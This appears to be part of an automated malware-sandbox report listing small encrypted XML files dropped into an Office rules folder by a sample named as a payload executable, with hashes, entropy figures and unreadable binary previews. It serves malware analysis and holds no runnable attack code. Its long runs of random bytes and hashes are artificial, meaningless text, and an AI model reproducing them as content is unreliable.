                                                                                                                          Preview:<?xml.-i9.P..._g;.n&..x."=...di.....6..J.}r.....>...E.DMT.B.O$..Y.1..\..1..8gb......:......1...`.;.?..s.D..J1.....z|B]......*D.W.p..n.ziQ#.......Ap.J..?.D_}....7B$~.7.....2M.[5HT~)B..\y..J..<7|..G~..<.*...`.W.@?IE,Qg....1-x.. o....{@.I.CA...[./uT......?[..5.Z... .:q.hBA...dq...V%.wZ.Y....0...b.b.". Zt..a...;*x.#<.e-..sC.}@.H.R..my.....+|".^...P...d..,h........(.]..;.x6......{.5.439dT...?N.N...bp...?..p.)..r...m....).x8X......+..6....z...`.2...a....d..........a'.S.A.....}...l.50..qk...B.....|.N . .m..u..[D....Z-..V0.!....jE.Nb.....Z'.j....g...<Dei.]5....M^....:f....B@.....<......t.....q..VT.CY.`,v..M...T..H.8H..><&..k.(M......>...;v%...d,%h.<.X.Z.Z.+...;.:..iO.<....-lH...b9:...>.X.B.V).O8...A.QJ...$V.0[0&0..K.....K6..S.E...>..............'.@U..M7ZJ.nQ4....Z.^%w..kF.......%.GP.d.V.d.q..H.sS..X.Yn....H..7./.......vo.j.0.=.i.xo9..R....*..Q.`...[p...1.......b[B..aM.M.va.h^...\.L.......F.<...Sx.x...z..(h..f...5.J.8.d.)(x.../..d%.x..n..J...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11705v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3505
                                                                                                                          Entropy (8bit):7.943995057840287
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:3HO446VlscDfPQu1d9YQMoTkTxQyB3ZyiWpCyn:+49VOcrt1d9YQFTk73dU
                                                                                                                          MD5:1871288268BE38B397EC9C8B1ADBB707
                                                                                                                          SHA1:951D717F65F1B7B715F678AC9697C16CEF2BFCA9
                                                                                                                          SHA-256:F3EAE4872BDB33E0FB49043A44C1465BB90893C9038B153E064E52218977BB01
                                                                                                                          SHA-512:324647F696CC5EB93BB2B44DC50AFBC25999F57E5C9F900D9C033886BB44330C922892F89EAA4323F83BCEC1565A1B536F54CAFECA4410E9070DC89AE34168E0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml}..1])..vF.7..]....[*.....G..1..K..YIi.(..l.+.z.\..........c..^..=l.MZ.7...S....&.....n.[...Rbe....fo....k.%.1`..2....*..;_Nd._...V>.i.C#3.N...S/mQ....d}.._&r#CE.O_...D.5.g.....$.....?.X.W.........x.`j... ..!.N.......g.bvG..4.D..M.<y..S....i.......Y;v..../.....cX...-..X S*........r.^+...v.)..[.?c...D......n2.zRz..?K,...d0%$..|]3.......z......>.c.|%.Z.b.jH{.T.N...IR.x_.X..f.....I9_Q..bs$...S..$EBH.%6Z...>.".V?J..).H>Z... ..Z...C....&....z......E....GNG....#....;.^W=...$a>I|...Wxi{...8.T.5G.o......s..@.U....f....F.#I..CE...D..Sn.$.j7.$.bS-6.yHu.I.^..n.....Tk.G.5..a.byA1|...(...1..xn..LU.t...8.3.w[.V.......f.D.Y..<.9....U...rV..3..."p..G*g5...D.~.......z.e...s.....^...==k}..i.H.....x..u.. h.]|.....r#..Z7fc..[./[....}4...4.qW.......H..~...C\S.....$.\t.$..w+b.<..`!.+hB....?2`_.gs.z.........0.mK....v....>..xu.gqn!......+..k^(TMv.]Q..^..I.7.......C...z.y..F^p..kPf...]}.n..I%..Z.._...p...P.4..bo...f.......=....[.,..z.r.vI6.n.K<.Zs?..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11710v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):965
                                                                                                                          Entropy (8bit):7.79942647291559
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:22wU8XAaUSfHqbkLTGTiiWmMryh9Rxq7Lh+bD:2bRAaT/cWEIJuh9+h8D
                                                                                                                          MD5:360E725C00D677D8B8AC04992FB8002F
                                                                                                                          SHA1:F0A648814BD2F8A0EBCA4D952AEFF823533C3E2C
                                                                                                                          SHA-256:CA79F337A918D9C281A5E102168C18B85FA7D37E2756D1CC5A38D6F165E7CFE5
                                                                                                                          SHA-512:994B84C40964BB8BD428299C9FE5647D4775D9E6EF56BD96421D0287E5E51D66BB5082991F06C37E1925C71A6332FC1CFA7842E57CBA0BDCFFFC3D7105E58D97
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmll~2..j..kW}1.;S.'4........1....._..*..)'.......3...{..)...3..X.).Z}.#.B.....c...RJ.5i..#.wZ.X.I...Y.q.I*.U.n\#..%.V.R.....'......<]09...4j..u#...i..j....D...@.|.X&...:X..d4..~b65.R.....|....N...n\.of(...WqO....!1.F....1.........;6.{A>.....{.7)....OU..l.H.}......[.s....E..1r.4#C@.cu.+p.....)..2..e2.>.f[A..)...[|.;....%.Nk\.R.l..W..`M2k@.fg...n...2........>J...........~..F..&..C`...!{..4>.Q........x.xh... p..J......<ZU?.....0D....,....wc.....U..Z..AP....X....J......d...8....Q......B.@.G..4..0..N...b..T...& ...&.j....RO..P~...+...A...I. ..ah..)^.M.=.(.....P..w..`.E...yr..4...T%-Fs........t.-.yYA..j<i.+...5sV3........E8......lp.q..bwD.......k.!..U..$.......=..C...n....^N....?.....E..(.....3..A..L.~W..Y...:......;-.CH..Y....N.'2.'....4..+j2M.j..z........|.C2q..U...n...$........c...].Hy..&..t.c(.Vj...6..*I.6...;@p...ci.t...u7.P[a..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11767v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2983
                                                                                                                          Entropy (8bit):7.938444889336404
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ESGQzPhRx7VRLyZvAi0fOoM7SGacatniCduPW6UWdC5ozBZjHKjtD:ESnjrQgfnMWGbattuPe8CSlZ7KZ
                                                                                                                          MD5:8735D52006FD1622A088974E0FD7781B
                                                                                                                          SHA1:9F8108489AB50A6DF07FED651740F436F4407061
                                                                                                                          SHA-256:FE0F63EDFAA7124868394D262462AFBBD7CD539989D97A83BB58C7B5AAD6526A
                                                                                                                          SHA-512:5C31B9C5C42A92DA3977E1B395E9360E134DD58757AAABE7AB73CF44201EB3D6EA818B4392D4B80E54E788E915694FBB61079B15891131BD0AD8A2F114ABF6AB
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..w...=.Y..B....k...`....`..p.P...f..,.,.k....m...-'.os...P..l....^...1y...Z$..O%...,z.F...XZ.l.\...>.P,>.ZD8.wd.......GP=.r9/`..*R.-.'.i....#..u.9.ad...\..`.$U.\?i....*..E"....6[.9Ar^.....[Gb.9....P...'..C..O*Wn...Te....#.dk..$>&...c.Z.l...f-.(.K.qyPF.64.d..G...~IF..O..q:.....u...".=>......~_..%y.l.]=U....>_%...w....<.o.JV...',..f...v.E..F...8....k...G.R...F.{.{....a...p....Z....5+F.h6....N.N]y....e.v..z..=..#.b..c..^f..f.&WEE....N..tg.:=r.....e..J...b.Y........7\...".YB.......(V.......p.9.../....c....\N...9.4..Ai?O4R[.X..t....'+M...a@."......M...>.i].F.t..g.q6.L.y...w....&.W..........xv.T.A...I..!..A...h.T....-T.u^>qs!vEm..I.\.... ..W....>..Z.....?&..t....M..;.... .....`.....<...8..V%....$..w.0...!.o.=+/=.,........i....W...z^Q....:5D6...!z...9.t-.<1.hj..T...B..F......Z.H.)y.}..#W......+.&......`......./`p.....).|?k....3)F.&..G.......d... .$q-......HV.....i.....#r\.)Q@..DDO..........T".e?.y...Z. V....<...)3.........O..V"b....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11768v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2487
                                                                                                                          Entropy (8bit):7.926076089710114
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:wvpMHuYccQiZgcyj6B5hFWJbR2ejSCt8OTkZ59s+ZLgZI8z6W8ETA/VBD:whK0i+cyjA88ejzwZ5SigqfVp
                                                                                                                          MD5:C298969D461E88B19F368E4D63801DAC
                                                                                                                          SHA1:567D554E59E5F3403AA87A79DEB1226935107006
                                                                                                                          SHA-256:14D0D0BB938B5C090EA2DA086F1452F19E0173902C3DBCECB888C222241D1C91
                                                                                                                          SHA-512:B6FB27A3CB5CA2CE3CCE4D29E900409CAC8445BCEE7E980D332CA21BE6989C8D32BED79872AD1826D2E4317A2B8ACB8C7038393B3A097D184DF93A61E4436B5C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...c..l...H...^2Z.[S.&.=.GM.....8.n_..R,u.....s.Y0.....K.>.=jB..4cK..'v.c#CD.Y.....R......h.y...........?.....L...1j4a...%V./.EU...|D.4ui...D.I.&...9........RPm.!.>...w>.u..E.xN..\.l.s...FY.;.c.r.Lkp..v.&.e/h.>.l..6{.,;.P.........$..Rv.&..H.HH.h...l.`..H..B...:..../..,.]v.}.$&..u....+).....\r.5t....M.1..V.s...t.....LPF...8....v...u1..sqY.E......$,@....h.6u.ks..6.S....?r.D...F.R/.RP$..}.T).."~J.zR]VS4.(..(...,'.3<u.:....(D..\'_...(Cp............^..'qm..h.\...Ud._.ulj.u..*.^..4S.#...X..7..wj..}p.Cq.)...l...K.....7...O .=b.{;J..Hu#Y..Mt........Jz..o..g..........o..+..?G....5.U5kK.#.m....j.p...(.t4.4.F.k/g._Fn......c)l.Lyu*.}`H8-..(x....j..f.'.Ka#o.X.L.d.#.}$w*p."<(.uD.Y'....6..Q#..T{....k.=W....h-ml.>V..K.....5...X........r. /...........c.%r....I.......?{<J..rG.k.p.....4...ew....E.g..e.=..O..4.M`.V..*.......,gL...E.B{.e>..8w.P7....>@s7..)...\...8C.....IL._`...9.....=.82...).f.R......l.J..H.......|....~_.J/..=OO...u.4.j....r.'O7.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11769v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3132
                                                                                                                          Entropy (8bit):7.942352975969342
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:GJu62DqEpJUFbxdbv3eQ7CK26GapDDe9q2ET:Gdq+Tbv3b7CK2RapDwqRT
                                                                                                                          MD5:66883C248A0D92E67DC885E8E92F6702
                                                                                                                          SHA1:016B605AB5F838ACEC3D4B66F03C696D43604EB6
                                                                                                                          SHA-256:0B6538AE14FE107588EF2403C8AFB2FC076ACE412F66C6AE2B7F67FC829F3945
                                                                                                                          SHA-512:502B7A692F568013AC223D061C34354D82FE9D142271713EBBD1D060E43E92444B0DC0D14F6128CF364E314F03AB6CD5CFAF4797737FE3A6A9DEEB437EA573DA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......SZ..(..J)..\K.......`....mw..6|/.M.E.9........G...|..y6[..y34..4..............I.u...zA...i>..n...R.a....0L.>^..rk4qI...T3U!.r....q...2^..O....7M..3$..:.M]_.J'm.1....&.=..Rq....k...;/.. g..;j..x.I..H....m.1m....l...(.p<'..R..G.9.9j..p..m.~.bo...}...#..r...+VF..OF,..[......Ne.Q.za..z.D...W.=...$...e".H.x...5R..>......W..Z.K......C.].....I.Fk1Qbt...."..,\.o..\..4Q.p..}A".T.M2?.7q}.J.>.Y...b#P$..._..lva.j....Hq..L.;@..B.|f.s....R....k.-K.`.]..r./...Z.n..,.{[...... o.u..P:.%w5f. ......Uu..............y..{#......F.C=..2...~..U..nP.l..98...]t.....Y.h.....t.....a...?M.Y.;.k.D....@..p..T...}..I6.a..U...\..:.~~..!~.,0..!.^..5..^q:.l..K.D.s.....Ix^..-X..~.....<..D:...1>'..q.....^.......`..-......|.........7.u...J.c......F0...[?....../...?#2.*...;|.)L=........D.....).&.~.4.2.zG...i.u..s..&x.8."..T.._.t..[.6L..u.(..J..]b.+yv.).<'.>.g:..cR..}.&x..i......m......h.(.T.(...B..[F....aTT7...H`...E......d.X+.x...C......k..:....1..W.K.1S.....o.l.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11770v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4968
                                                                                                                          Entropy (8bit):7.9640520453663415
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:3N6bWOHrC1P8avi3ju8s7rv0EK9mFs765OLC1JIc2fjpXesQntt:YbTLC2a6zb8v0r571CcBXo
                                                                                                                          MD5:7376B3BB2D585FF1B3174EBA6CC5C709
                                                                                                                          SHA1:442EEDAD3D8C41C35F0A6F69D44B89F7FEC9A9AE
                                                                                                                          SHA-256:D9D7CE9A24DDF26DE54AFEB7523B39E31E547D7612D0B9DC03F3792AF3A4A9A7
                                                                                                                          SHA-512:39DACBB1A4DF30E1D1CA0B597F3CD910CA60C97DDBBD965CD5C30B66227331B52B6AAFA8DCC0A64AA87D9C327B6A3F1FF6EEDDB836784FAE2283DB9C9BD16C2A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlw1..ER*....~..E.9..-A".<.z....F\M.4....L.S.op%.h6h.,.j..........E..3+..h..D$.F.{Z..{..U..}B7.wS0.0.P>.T.....L-.}.........V.3`..|.v6."...4.....y..;)..).:.n.....:....?.h........TI..L..x.....?7.....v. y....B.......9W..r.yD.z.....i..Ve..X...84.Z.-5...{.y.6....b...\.........B...'71b.G..QBVG......#.Q.$$.^LC...Lz_o.QRT...!N|<.K-O...K.:sE.@.{......E5E.U...?\..\'.+]..i.s..C...f..i..t..k!..%ly.Z...S.aI.H.........O.n..T.f.z.2...5.&U.........2.._..j..?...|...........>.......k.....El.G.^..x.|.N....6..)..x......U..h..~..T/.RX..?QK3.n.tF.l.2l....]!).U..R..|..F.G.....UV-..i..h)B..!av.....C=..[..C..^]-..%....^.S.2..nRx.......>..._ H.F.Y.......[XNz*4.a.........`...q;I....._k,../'g.A.........u..cu...qV ...n?0.k.jA...V.h...D...'........h.^.....Y:.g.PfP..0..rR....V.....4^.V:z.G..F.S......c5...M.|.B....'.....B...B%m;..e...g-...%.#.yH].n....4.LH...'.....v.0XQwI.\S.....`.c..6.&T%.".l)...6x.]...P........N..k.Tp.*........tE....3..%l.W|....H~.....*.F

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11771v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7596
                                                                                                                          Entropy (8bit):7.977441324463694
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:0I6SiKgGCGS4p5mtC1FmvMmck0vKzVbkY+yuy:0IbxS4p5mwD6sKzVA6uy
                                                                                                                          MD5:DD44C6274C61DDC7F586CDD599ECE4E6
                                                                                                                          SHA1:76699A2975FA8531FBCD4823A4C43DC0AD1230C4
                                                                                                                          SHA-256:72B83D992FC18CFC5542694B0C88B8CEFD09C19C5B0770C11EE3BD0EF37C55F9
                                                                                                                          SHA-512:0558F951A08E8181BA2828AAF879203086215671168AAFAF786EF46211B3657A95F51F860DF2A88DE50929CAAEBEA9DE6CB2B01CAB206519EEE058264A8BDF9B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..-.,dw.43kHD...........?.....>.b.......Gy........bt~..[\....EGL..Y... ....X.R......p..Sl6..A.!....=u...zF......M.F`9..........b....8.72.S....Y...A...n..ZG.."[.\M.s.cv..~}.s.._?A.E.b.A...N...j1.A......... ..!.=.5...>.;..{....+.....,VQm..D.}F..>;(..4........g....N6.'.g.....J.a|?.:.|YZ."B.*_Vk....W..m.%J.......Z-2.<...G..).m,...t.....X.............).#..GC......E...Rj...m...".!.5.l\....7.8...<.~..V..c....O.n.l..N.+..........2...a...*XQ.X.+..z^t.......G..Ig|}.|...@..~......&.q.|..$.).....Y..i.j....1..........vXZ............Wc.U.!f_9.0....'.t? .ns......bH+......r.K.\4.!...M."..]..h.P..(........oY..#<,....+.6.......t..a.a....B...c..~."|.P8..L..>.v...2C.4.............l.t....5.m.....I.Q..L.d..(..!jy.8..'..;.)}}.<m..M.e^.h..*...c..S.T\.....`..N<?......K\..,.#.<....B.I616..Q.v.._%.v.39.+_.}|.Md?.^......$:,..}A...re.........N..o...."A;*Ik........W.FF.!.U....!.....>... ..*a #...t... ./^.'.<s..J.|h...I.vr.:<.....0.I.@..o.tKC.YX..o..u...Zk..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11792v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7356
                                                                                                                          Entropy (8bit):7.976840583495589
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:gnF72jO+5tPpRoFcaY932azzWAnGJppyc:6FSjlR2OaeGoNnGJHyc
                                                                                                                          MD5:8BF6D1E7A528D54367285ECA8DB8F84A
                                                                                                                          SHA1:DD4B72ACEABD2F7A89A3F6F5084486EA74A94650
                                                                                                                          SHA-256:A49F70A140F8B46DF5A69EF299AC6B53721878D5E6F92469B3E0F3993C8397A4
                                                                                                                          SHA-512:B69E1DCF357A5D1E867BE2FC9DF04A6D5DB422BFD5F9B33F267EE6294C1BFAD382BB80067F1FF9D02256D9C77E4F81E10013AAD9E6D23A1DEF46ABFC188B5956
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...)!yfB.....]....{.{s..J.......x...q."...!...I1..+.d..jA-...q......zG{^y..].^.b.;.b.......)..T#>....}9 g.i6Y.X...9.O....\+-..)qo...Q.U..ed......<.y.0.,A...\...z.C.<.s5.......<....I...E.'`p;z7....q.o|%~.p.0`(.....\...qO.6NqW...:.a...C.....fL... +...B.h..R.(..*."....'...1...wJ..n..{...uh.<....}.5}.)G.B...i......P.b....JF..c....P....ViUbY.A;..F.i.<.,.B_CH...q.SzfB......a..WD.'.'.@....>....z..ndI........ ..s.gl`MCU_.wv..5<.{...f..4.M..u[...;.D.<i}.je).P.n'.]...X..B...f...F.1..5.#.'|&.....3....=!.......|..h...}.b..S.....Q..JdF....S.......4#=...^.@.. )..m]...._t{-.X...."...l.a.HG.N._..t....kF ....F..g.yY........d.'.\......A.o.(u...<.G.x.s..%..FL.....0...'......P..kf...+.e...eM.y..^.@...O...+v........evo."..C....C/...W..........u.Z...........Y.f.)ZsX..".........2.|...u.QC.......(.v.-!......4hv.LT).PGXC".v+.'(Q...c.A..4p.w2.........kk..MS3.....\.]{hg.@....)...JG@...#W...F.'.$) .;......{.z......6..q..Sa......j~.0..d.-....l..$...<..Uq..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11793v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1551
                                                                                                                          Entropy (8bit):7.86530676680286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:wWJs7EGTkp2bGpf8ptXcgY7qhEOpX1wCHz3/D:hegG4poKsXcgYkEOpX1wCTb
                                                                                                                          MD5:B595F7E04BC1F5B86014F98EEB306270
                                                                                                                          SHA1:98D2465C3AD802E771F2240D04B1D14CC9554291
                                                                                                                          SHA-256:64D61BB71D63362FC9213811E8A996AFC6B88B1BAEDD4AAFCA49AB03DA1C8B30
                                                                                                                          SHA-512:E77631254251AB054D7AD5EC07311DA130847168E254166032E0265994AA442608CA4ACEF8FAA28A9400B2A89EDB29208B603BF91BEF1D0844CCD33198ACF62C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...z".o..\...J4.x.K1.o..nnd.K.H.E.H}3m6P...\.S>.&..k.U?4.t.;..V.C.d.......?.....=.N.o.E?F..\t5........d.l.`i....M...AF~1..\.z.Ap` .....9v=....%....P&.$....s.fDLn.l...QN2;...J}U.g#.b....5`.(...8..!...u.x..TN.:,..v.-5{..../.4{.........A...Xk0B.#...v|....+..>.&u....f.L..,.80..J."3...zK.4#0 .5UYb.-U.&.+.....:..!..AW.g.2.....&..'...8.0.#..]i.&...ou1..bj..p.W...{..Lo.c.3....o3..x....-....3..._.g..7..L...~@]...W...../GN.;....;N.r.=.F".,.%.....eQ./..K.\......n5R....T@r9b.XK.P...*P-#.k....2.%.A.RV.aB..5..M.,.......I.&.8;...a...KQ|..;......I$~.....h..[ %.5.j..FnK.~.....~.J..3...'.. u....=.Lf<rR.R.I`t.vX.'.|..p..h... ...{..i@DRJ.L.OC...0.....o......mP...|t1Qwz.`....&..pma.px;.W1.emr)....$K.n...;.$M..A7.$...R.WN.>.".1o..p..P^..t.......@.....O..{}.....4st.....W@..@+..9....A3..n..(2i..M........-7@}.....$..v....7..gk....1...W......%..n...mf@.&=g..kwmo.q...O..i../.........+.(%`i..@.....(q.6...bMd..(....2kn.'....5sX......RK.c...Z.&.)_w..p..d.E"6R.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11794v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1716
                                                                                                                          Entropy (8bit):7.867428718389586
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:MV7y0g9pSbzunujRJl0GDee9MMnKGOLDuD:MVs9pMzunSJtdng3W
                                                                                                                          MD5:5F022CBEA74B1F3F53E565E0D7F8225F
                                                                                                                          SHA1:8FEE4A74FB7DAF09194D029E0944DF6A0B98842D
                                                                                                                          SHA-256:838175C7E9753FDB0F8442BBD5D7D09F5CC95FCA8476586DE40A1BCDDCAFB901
                                                                                                                          SHA-512:C2F2EDB4EEC0A5F42B6ACB2EC2F4C06A40D10FD184CD20F0103058E46BBDBA27A85F650C9C0C3BD6242F07D0566D8E92CFC033AC3886B7C293149136B1095A7B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....q.\.~....49..@se9b...zl..c..=(.:...L.pP.<.aWANo..P9..h|.Ko.p..P\....E>&..=5...6/.|...~..._..>..X:..8..P..+..5J.....hO*..?..........Nc....H._.&...#...!%}.)u...{.qU...h.#H.n.y...t:.g.....V.z.2.u.1+.I..{+...U=s7..'.A9M..lN.=...o..+...R.8[E.j..ya...#&51.T....avZ.....B.!%..<C..~..wC^h...{...p&}..S....g{...s.?....NH{t.@...P..7.0..:.........ds.zk~.g........7..Z.W1...+_.._...cm.1.4R.7.i..5).!^....T-..,.fm..)..Pq>.l..'........?-......5."X...=&.].F...E...l......B...%...qt.*RV..~_.o.`...~.M..G.z.n..._z..M..O6.^1._..W.."..U.........t..F.....=vQ]M6..........|....y....T...-............f....{X..F..@.S.*..x......z...O.WJ).....]..W:......A.+.}..^}h.....c.6.`...)[{,S^G...u.~.x..(.........c~Lt...z.....1.|.6...t....v.U..D.qK....;.yS<._....1.q..:.AJC^@?. ..0+........z....1C.u...._...z.W.~L.k.O...$..>.....d...L...W.%.<:}.s|EsU<`#W.8#.F../^..A.."e....i^....@.@.dhp.zC7.aR..tS.Hh......9.|=Q........sN...#.4v...t.V.\.6.<R/......."...G.......?.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11834v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1737
                                                                                                                          Entropy (8bit):7.889256726477862
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:cV18vr1lbNmLmWyM/hIWE0xIsKqMplktHipBSM14oE78D:DrLsLmPMGW0sKdvKToT
                                                                                                                          MD5:96B44D093E6B79A4514E05D821A893DC
                                                                                                                          SHA1:24D4CD4AE18ABE0C95A245A5D4CF8B685774804B
                                                                                                                          SHA-256:3DAD8FD356CEA05DAFE95274529988465CB79C7CFCEAB1DA6C7438673CBAD3D2
                                                                                                                          SHA-512:033B9CEA112EC513AB8EDA0583BA213B3150184542AB7AC8586684F2E6CDB6AEDEFE34300FA6443083C38199B1C8C162E3227FF5BD3E1A470DFA619ED97DDA3A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.@..?.R,h.....;...Mu#.....'....A[ .......'....V...vz..'.\.u;.....u.=..C.x5...})..g./;.oDV.4..#.q......b..+a.iq}Z.8.8~<)P..#..j...A^$s.....am.+..*...zM...u..xs59`....a)w....y.....+N+..h.-/r-.W.........3....U3....Eu.,.....h{...DZ.....\..k.[uY.oXc.&..........m.....WG... .>St...@i..........;.g'9..E[bvC)....D+.%>.(g.(..?*...R...3.J.N.3o...6..9}...t|.QTa..0{..!.....Q.`..+T...q..8.........fWV.0a..uY(.5....a..k>....'0....nf..9..5.......\...m...b.7.....rQ.tr.]k.r...&6....|..N..?PS...t=..=.s3....,.O.T.=\A.....'.^..NT.....4X....B4.o?4r5R..."<".!..j.. .........UzjR...H".+t.Q=?.DY.Q&@.Cd.L...tp.?.....B...T.....H.Z.U.(kd{. ...3....u..9B..w.w_.].3i.y.&.......%-_.>...6....\.f..2c..._{v.^..-7*.je..>..WA;.A..C&.M..?[...|..9..C...k~...H.d...s.%....`.z....].x..*'&...N...X.C.....h0..eH+!&0..}\...|eY.*.j..bj...9..T\.>_.O..j.2.J.6...+...>.}.M..\.Z.yV,.\!....N....Z2...Z_...=s4.V..e.^.?q...iE.F...{........). .d./@5W..C.$1.5j.T"............

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11882v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1448
                                                                                                                          Entropy (8bit):7.860840272002796
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:jWfHzZZyZg/F72HtH/Y6qnKYJxBt26FVhoTVabZbaHB3vM8jFbD:jWftMZEF72HW6qXJxBt5FfGVabUh3vMw
                                                                                                                          MD5:2791D416AB1BFDB614089C3AB725AF01
                                                                                                                          SHA1:EBED670B557805FF544F2EEACC544336965A2EC3
                                                                                                                          SHA-256:7AE9BABB9B0C8A3B525901938D111CAFD369EF104FADC94757ACCD690E627DB5
                                                                                                                          SHA-512:FFB7A5B4789B0F56B9AA0DF0EA506A5A478D8C0B945E4B846FE66A0FD8118E34C3EF69BCD40DBD3A914CDB0B2A848DA906C00D0A75924B1965F660EC15A5F4EA
                                                                                                                          Malicious:false
